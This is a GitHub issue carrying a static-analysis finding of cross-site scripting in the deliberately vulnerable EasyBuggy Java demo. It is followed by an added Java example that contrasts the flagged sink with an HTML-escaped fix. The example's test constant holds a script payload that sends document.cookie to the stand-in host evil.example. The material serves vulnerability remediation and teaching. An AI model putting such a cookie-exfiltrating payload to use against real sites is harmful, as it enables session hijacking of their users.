Shai-Demo-Org / Java-Demo

Apache License 2.0

WhiteSource SAST Vulnerability (Risk: Medium, Type: Cross-Site Scripting) #72

Open shaimael opened 2 years ago

shaimael commented 2 years ago

WhiteSource SAST Finding (Scan - 2022/03/14 01:40:45 PM)

Vulnerability Type: Cross-Site Scripting
Vulnerable Sink Call: writer.write(getMsg("label.login.user.id", locale) + ": " + userid);
Input Source: session.getAttribute("userid")
Vulnerable Project File: Java-Demo/src/main/java/org/t246osslab/easybuggy/core/servlets/AbstractServlet.java

Function Call Stack:
0 - writer.write (Line: 82) - Java-Demo/src/main/java/org/t246osslab/easybuggy/core/servlets/AbstractServlet.java
1 - responseToClient (Line: 55) - Java-Demo/src/main/java/org/t246osslab/easybuggy/vulnerabilities/CodeInjectionServlet.java

User Input Flow:
0 - session.getAttribute("userid") (Line: 34) - Java-Demo/src/main/java/org/t246osslab/easybuggy/core/servlets/AbstractServlet.java
1 - userid (Line: 34) - Java-Demo/src/main/java/org/t246osslab/easybuggy/core/servlets/AbstractServlet.java

Description: Tainted input "session.getAttribute("userid")" was received in line 34 of the file Java-Demo/src/main/java/org/t246osslab/easybuggy/core/servlets/AbstractServlet.java:

String userid = (String) session.getAttribute("userid");

the value is then assigned to the variable "userid" in line 34 of the file Java-Demo/src/main/java/org/t246osslab/easybuggy/core/servlets/AbstractServlet.java

String userid = (String) session.getAttribute("userid");

and finally passed unsanitized into a sensitive sink function "writer.write" in line 82 of the file Java-Demo/src/main/java/org/t246osslab/easybuggy/core/servlets/AbstractServlet.java, causing a Medium risk Cross-Site Scripting vulnerability:

writer.write(getMsg("label.login.user.id", locale) + ": " + userid);

Mitigation Recommendations:

Further Reading:
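The flagged sink, reproduced as an added example that is not EasyBuggy's own code and not part of the scanner report: the raw concatenation the finding describes is shown beside a form that HTML-escapes the user id before it reaches the response writer. The session lookup and the localized getMsg() label are replaced by constructed stand-in values (TAINTED_USERID, LABEL) so the class compiles and runs offline with plain `javac`/`java`; the escapeHtml helper is written here for illustration and is not taken from the project.

```java
import java.io.PrintWriter;
import java.io.StringWriter;

/**
 * Added example (not EasyBuggy code). Shows the sink reported by the scanner,
 *   writer.write(label + ": " + userid);
 * once as flagged (tainted value concatenated straight into the HTML body)
 * and once with the value HTML-escaped before the write.
 */
public class XssSinkDemo {

    // Constructed stand-in for (String) session.getAttribute("userid").
    // Whoever populated the attribute controlled this string.
    static final String TAINTED_USERID =
            "alice<script>document.location='https://evil.example/?c='+document.cookie</script>";

    // Assumed stand-in for getMsg("label.login.user.id", locale).
    static final String LABEL = "User ID";

    /** The flagged sink as reported: the tainted value is written verbatim. */
    static String vulnerableWrite(String userid) {
        StringWriter out = new StringWriter();
        PrintWriter writer = new PrintWriter(out);
        writer.write(LABEL + ": " + userid);
        writer.flush();
        return out.toString();
    }

    /** Hardened form: encode for an HTML text context before the write. */
    static String hardenedWrite(String userid) {
        StringWriter out = new StringWriter();
        PrintWriter writer = new PrintWriter(out);
        writer.write(LABEL + ": " + escapeHtml(userid));
        writer.flush();
        return out.toString();
    }

    /**
     * Minimal HTML entity encoder for HTML body text (also safe inside a
     * double-quoted attribute). Encodes the characters OWASP's XSS prevention
     * guidance lists for HTML element content; null becomes "" so the page
     * never prints a literal "null".
     */
    static String escapeHtml(String s) {
        if (s == null) {
            return "";
        }
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#x27;"); break;
                case '/':  sb.append("&#x2F;"); break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        String raw = vulnerableWrite(TAINTED_USERID);
        String safe = hardenedWrite(TAINTED_USERID);
        System.out.println("vulnerable: " + raw);
        System.out.println("hardened:   " + safe);

        // The check a reviewer makes on the fix: no tag survives the escaped path,
        // while the flagged path echoes the attacker's markup unchanged.
        if (safe.contains("<script")) {
            throw new AssertionError("escaping failed: tag reached the output");
        }
        if (!raw.contains("<script")) {
            throw new AssertionError("vulnerable path should echo the tag verbatim");
        }
    }
}
```

Two points worth keeping in mind when applying this to the real servlet. First, a session attribute is a taint source because whatever stored it (a login parameter, a cookie, an earlier request) was user-controlled; the session boundary itself sanitizes nothing. Second, a hand-rolled encoder like the one above is enough to show the fix, but in production the usual choice is a maintained library such as OWASP Java Encoder (Encode.forHtml), and the encoding must match the output context: a value dropped into a JavaScript block or a URL needs a different encoder than one dropped into HTML body text.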